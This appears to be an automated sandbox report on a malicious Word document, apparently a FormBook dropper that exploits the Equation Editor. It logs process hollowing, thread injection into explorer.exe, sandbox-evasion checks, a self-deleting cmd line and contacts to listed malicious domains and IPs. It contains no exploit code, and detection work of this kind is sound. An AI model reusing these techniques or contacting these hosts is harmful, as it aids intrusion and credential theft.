          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\prosper3512.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\prosper3512.exe'
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: control.pdb source: prosper3512.exe, 00000005.00000002.2161047625.00000000025D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: prosper3512.exe, control.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeUnpacked PE file: 5.2.prosper3512.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_72FE2F60 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041D82F push dword ptr [3253D521h]; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00417A8C push eax; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00407B24 push ss; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00407CB2 push edx; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CEF2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CEFB push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_004176A2 pushfd ; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CEA5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_004176BA push ds; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CF5C push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0093DFA1 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_004176A2 pushfd ; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_004176BA push ds; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041D82F push dword ptr [3253D521h]; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00417A8C push eax; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00407B24 push ss; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00407CB2 push edx; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CEF2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CEFB push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CEA5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CF5C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000976A2 pushfd ; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000976BA push ds; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00097A8C push eax; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00087B24 push ss; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00087CB2 push edx; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009DD8E push dword ptr [3253D521h]; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009CEFB push eax; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\prosper3512.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeFile created: C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00409A80 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2928Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 2908Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: prosper3512.exe, 00000005.00000003.2146169272.000000000055F000.00000004.00000001.sdmpBinary or memory string: Vmciwave.dll
          Source: explorer.exe, 00000006.00000000.2089134923.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2097033835.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2097033835.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: prosper3512.exe, 00000004.00000002.2086434172.0000000000614000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: prosper3512.exe, 00000005.00000003.2146169272.000000000055F000.00000004.00000001.sdmpBinary or memory string: 9Vmciseq.dll
          Source: explorer.exe, 00000006.00000000.2089218347.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00409A80 rdtsc
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.pwagih.com
          Source: C:\Windows\explorer.exeDomain query: www.skip1-dndasasd.com
          Source: C:\Windows\explorer.exeDomain query: www.centerstageacademyaz.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Users\user\AppData\Roaming\prosper3512.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeThread register set: target process: 1388
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 540000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\prosper3512.exe'
          Source: explorer.exe, 00000006.00000000.2112996146.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2112996146.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2089134923.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2112996146.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 432651 Sample: AWB00028487364 -000487449287.doc Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 12 other signatures 2->59 9 EQNEDT32.EXE 11 2->9         started        14 WINWORD.EXE 291 25 2->14         started        process3 dnsIp4 37 carbinz.ga 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 9->37 33 C:\Users\user\AppData\...\prosper3512.exe, PE32 9->33 dropped 35 C:\Users\user\AppData\...\prosperx[1].exe, PE32 9->35 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->77 16 prosper3512.exe 20 9->16         started        file5 signatures6 process7 file8 31 C:\Users\user\AppData\Local\...\System.dll, PE32 16->31 dropped 45 Multi AV Scanner detection for dropped file 16->45 47 Detected unpacking (changes PE section rights) 16->47 49 Machine Learning detection for dropped file 16->49 51 2 other signatures 16->51 20 prosper3512.exe 16->20         started        signatures9 process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 20->61 63 Maps a DLL or memory area into another process 20->63 65 Sample uses process hollowing technique 20->65 67 Queues an APC in another process (thread injection) 20->67 23 control.exe 20->23         started        26 explorer.exe 20->26 injected process12 dnsIp13 69 Modifies the context of a thread in another process (thread injection) 23->69 71 Maps a DLL or memory area into another process 23->71 73 Tries to detect virtualization through RDTSC time measurements 23->73 29 cmd.exe 23->29         started        39 centerstageacademyaz.com 184.168.131.241, 49167, 80 AS-26496-GO-DADDY-COM-LLCUS United States 26->39 41 www.skip1-dndasasd.com 26->41 43 2 other IPs or domains 26->43 75 System process connects to network (likely due to code injection or exploit) 26->75 signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          AWB00028487364 -000487449287.doc30%VirustotalBrowse
          AWB00028487364 -000487449287.doc36%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\prosper3512.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe30%ReversingLabsWin32.Spyware.Noon
          C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\prosper3512.exe30%ReversingLabsWin32.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.control.exe.540000.0.unpack100%AviraTR/Dropper.GenDownload File
          5.1.prosper3512.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.control.exe.6523a8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.control.exe.262f834.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          4.2.prosper3512.exe.5c0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.prosper3512.exe.25d0000.4.unpack100%AviraTR/Dropper.GenDownload File
